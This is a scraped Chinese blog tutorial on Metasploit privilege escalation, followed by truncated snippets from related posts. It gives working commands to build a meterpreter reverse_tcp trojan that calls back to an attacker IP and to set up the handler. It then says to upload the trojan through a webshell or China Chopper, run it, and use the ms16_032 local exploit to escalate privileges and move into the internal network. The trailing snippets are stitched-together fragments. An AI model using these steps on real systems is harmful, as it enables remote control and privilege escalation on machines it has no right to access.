2. 程式人生 > >kali下msf提權

kali下msf提權

阿新 發佈:2018-12-11
  1. 生成木馬

Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe

  1. 配置監聽程式

  Msfconsole 開啟Metaploit

msf > use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.184.132

Exploit

現在將1.exe 通過菜刀或者webshell 上次到可寫目錄,並且執行

這樣就監聽成功了  獲得一個session (會話)

Getuid 檢視主機名

shell 進入命令列模式

當然這裡也可以載入exp

Exit 返回到meterpeter模式

Background 返回 multi/handler

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 載入exp

Session 1 返回之前的會話

Exploit 進行提權

這說明exp執行成功,可以進一步提權,內網滲透了

相關推薦

kalimsf

生成木馬 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置監聽程式   Msfconsole

metasploitWindows多種方式

body spl oca amp 參考 use com 要求 abd metasploit下Windows下多種提權方式 前言 當你在愛害者的機器上執行一些操作時,發現有一些操作被拒絕執行,為了獲得受害機器的完全權限,你需要繞過限制,獲取本來沒有的一些權限,這些權限可以

kalimsf中nmap的使用

kail nmap metasploit 端口掃描 內網滲透 網絡拓撲:1.啟動postgresql數據庫:root@debian:~# service postgresql start2.進入metasploit:root@debian:~# msfconsole msf > 3.

滲透之——MSF

在WEB滲透中當我們拿到webshell了,我們可以試試用MSF(metasploit)來進行提權,在MSF裡meterpreter很強大的! 我們先用msfvenom生成一個EXE的木馬後門。 msfvenom -p windows/meterpreter/reverse_tcp -e

metaspolitUAC以及日誌清除

在獲得webshell時但許可權不夠大,這時候為了完全獲得受害者機器的許可權,使用msf進行後滲透。 # 一、獲取Meterpreter會話 Meterpreter 是msf的一個payload,目標執行之後,我們會得到一個會話,和常見的shell會話類似,但是它的功能更加強大,它是執行後滲透測試的實施通道。

metasploitWindows的多種方法

sys png 獲得 詳細信息 參考 leg hack 用法 spl metasploit下Windows的多種提權方法 前言 當你在愛害者的機器上執行一些操作時,發現有一些操作被拒絕執行,為了獲得受害機器的完全權限,你需要繞過限制,獲取本來沒有的一些權限,這些權限可以

soap註入某sql2008服務器結合msf進行

soap註入 ms16-075 soap註入某sql2008服務器結合msf進行提權simeon 在實際成功×××過程中,漏洞的利用都是多個技術的融合,最新技術的實踐,本次×××利用sqlmap來確認註入點,通過sqlmap來獲取webshell,結合msf來進行ms16-075的提權,最終獲取

Metasploit(msf)系列-利用瀏覽器漏洞滲透

         我最近在學習Kali系統msf框架的使用,怎樣利用瀏覽器漏洞滲透提權,現在我就把學習到的一點小成果展示出來。在此之前我要先介紹本次利用的漏洞是ms10_018,想具體瞭解該漏洞可以參考:https://docs.microsoft.

Linux用SUID

關於SUID詳細:Linux下的使用者、組和許可權 SUID可以讓呼叫者以檔案擁有者的身份執行該檔案,所以我們利用SUID提權的思路就是執行root使用者所擁有的SUID的檔案,那麼我們執行該檔案的時候就得獲得root使用者的身份了。 已知的可用來提權的linux可行性的檔案列表如下:

【日常】在某特定條件奪取伺服器許可權

1)Serv-U 環境攻破伺服器 上次說到學校伺服器重灌了 但是拿到了serv-u(以下簡稱su)的許可權 然後想起來說學校嘛 從來就沒有說過什麼su降權之類的 所以su預設都是system賬戶來執行的 然後因為是系統管理員嘛 那我們給自己開個管理員許可權的賬戶 畢竟這個

各種、滲透經驗技巧總結大全()

liunx 相關提權滲透技巧總結,一、ldap 滲透技巧: 1.cat /etc/nsswitch 看看密碼登入策略我們可以看到使用了file ldap模式 2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=

為Android應用程式讀取/dev裝置而(一)

//分別遍歷/sys/class /sys/block /sys/devices device_init() { coldboot(fd,"/sys/class"); coldboot(fd,"/sys/block"); coldboot(fd,"/sys/devices"); } //後

Linux————Linux三種不同方式的技巧

在滲透測試或者漏洞評估的過程中,提權是非常重要的一步,在這一步,黑客和安全研究人員常常通過exploit,bug,錯誤配置來提升許可權。本文的例子都是在虛擬機器裡測試的,不同的虛擬機器可以從Vulnhub下載。實驗一:利用Linux核心漏洞提權VulnOS version 2

Metasploit(msf)系列-利用快捷方式漏洞進行滲透

原理:        利用WinXP、Windows2000、Windows2003、Windows Vista等系統存在的漏洞:Windows Shell中的漏洞可能允許遠端執行程式碼,如果顯示特製的快捷方式圖示,則可能允許遠端執行程式碼,成功利用此漏洞的攻擊者擁有與本地

windwos基於exp的

pre 數據 mage wrap pac nbsp 漏洞利用 hit .com 00x1: 本文是基於windwos 補丁的漏洞提權。 其實是一件很簡單的工作:如果看成數據庫的3張表分別是: 未打補丁表, 補丁漏洞表, 漏洞利用提權程序表。 為一一對應關系,所以就是資源的掌

如何在CMD運用管理員

管理員 鍵盤 如何 密碼 用戶 方法一:鼠標右鍵 這個方法比較比較普通, 點開開始找到cmd,右擊鼠標“以管理員身份運行(A)”這樣調用就是管理員的權限; 方法二:快捷模式 在點開win+R後,選擇“以管理員身份運行”,然後確定;可以這還是會調出UAC的提示界面,選

利用linux漏洞

linux漏洞 提權就是讓普通用戶擁有超級用戶的權限。 本次試驗漏洞適用於RHELt或CenOS系列5~6系列所有版本。主要利用/tmp/目錄和/bin/ping命令的權限漏洞進行提權。 試驗環境:騰訊雲CentOS6.8 內核:2.6.32-642.6.2.el6.x86_641.查

Windows中使用命令行給普通用戶成管理員組

windows 修改密碼 管理員 用戶 新建 在進入CMD後1. 首先查看當前用戶信息net user UserName2. 新建用戶、修改密碼新建用戶 net user add UserName修改密碼 net user UserName *3 將用戶加入到本地組net local

windows非管理員限安裝mysql

mysql安裝 方式 我們 win 一點 尋找 非管理員權限 console 密碼 windows下,mysql有兩種安裝方式: 1.msi安裝 2.zip安裝 無論是哪種安裝方式,都因為需要將mysql安裝為一個服務,所以必須要以管理員權限安裝。 因為公司的換了虛擬機,無

進程

pre 可選 efi att html 數組 pro ret 參考 GetCurrentProcessID 得到當前進程的ID OpenProcessToken 得到進程的令牌句柄LookupPrivilegeValue 查詢進程的權限 AdjustTokenPrivile